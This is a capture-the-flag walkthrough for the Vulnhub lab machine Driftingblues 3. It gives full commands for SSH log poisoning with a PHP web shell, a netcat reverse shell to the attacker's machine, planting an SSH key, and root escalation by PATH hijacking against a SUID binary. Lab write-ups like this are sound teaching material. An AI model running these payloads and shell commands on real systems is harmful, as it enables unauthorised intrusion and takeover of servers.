Vulnhub – Driftingblues 3 – Walkthrough – Writeup

Previous machine walkthrough: Vulnhub – Driftingblues 2 – Walkthrough

Link of this machine: https://www.vulnhub.com/entry/driftingblues-3,656/

Foothold

fping

fping -aqg 10.0.2.0/24 # target identified as 10.0.2.10

nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.10 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -p$ports -sC -sV 10.0.2.10

We saw some interesting entries in nmap. Let’s visit the link.

We found a message in the link.

man there's a problem with ssh

john said "it's poisonous!!! stay away!!!"

idk if he's mentally challenged

please find and fix it

also check /littlequeenofspades.html

your buddy, buddyG

Let’s check this new link /littlequeenofspades.html as well. On the page, I didn’t find anything, but on the source page, there is a base64 encoded comment.

As you see above, there is another base64 that has the message. So, let’s take a look at that page.

It looks like, the logs are being generated on that page.

As you can see, the username is also displayed on the page. If you can inject some PHP code instead of the user, then that would result in remote code execution. For this purpose, we have the command system. We can simply inject a code in the log which would again take commands from a get parameter.

ssh '<?php system($_GET["c"]); ?>'@10.0.2.10

Now, we can run any command from the link in the format 10.0.2.10/adminsfixit.php?c=

Let’s list the files.

We got it. Now, it’s simple. We have to open a reverse shell. So, let’s check for nc. To do that we have to the command as which nc. It appears as if the server has nc. So, we are going to listen on port 4444 on our local machine and invoke the reverse shell using the php file.

On local machine.

nc -nlvp 4444

On attacker machine.

10.0.2.10/adminsfixit.php?c=nc 10.0.2.15 4444 -e /bin/bash

We got the reverse shell. Now, let’s spawn a pty shell.

which python # gave us python path
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Now, doing Ctrl+Z will send the session to background. Then in that terminal we can set some stty commands.

stty raw -echo;fg
reset
# type xterm if prompted for terminal type
stty columns 178 rows 98

Privilege User

ls -al /home # lists a user robertj
cd /home/robertj
ls -al # we have a user.txt file without read permission for other user
# we also have .ssh directory

So, we can add our ssh public key to a file authorized_keys and login using robertjs from ssh. We have to change permission so that robertj could write on the file.

cd .ssh
echo __your ssh public key__ > authorized_keys
chmod 777 authorized_keys

Now, let’s log in using ssh from our local machine.

ssh robertj@10.0.2.10 -i .ssh/id_rsa # the private key - usually under .ssh folder in your home

We got the shell from user robertj. Let’s view the flag.

cat user.txt

Privilege Root

We will be using linpeas.sh for enumerating Linux. You actually don’t need that. You can skip this part and use the find command that I have written below this.

For using linpeas.sh:

On local machine.

python3 -m http.server 8080 # you should have linpeas.sh on the directory

On target machine.

wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.sh

Now, execute linpeas.sh and save the output to a file.

 ./linpeas.sh | tee output

We actually found a binary that has suid permission as root. That is the main purpose.

Using the find command:

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

Let’s see what it does.

It looks like, the command further calls the other three commands. So, in this case, we can serve a directory (/tmp) in the path and add a custom binary of the names used. We will begin with ip.

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

We got the root shell and we got the flag.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments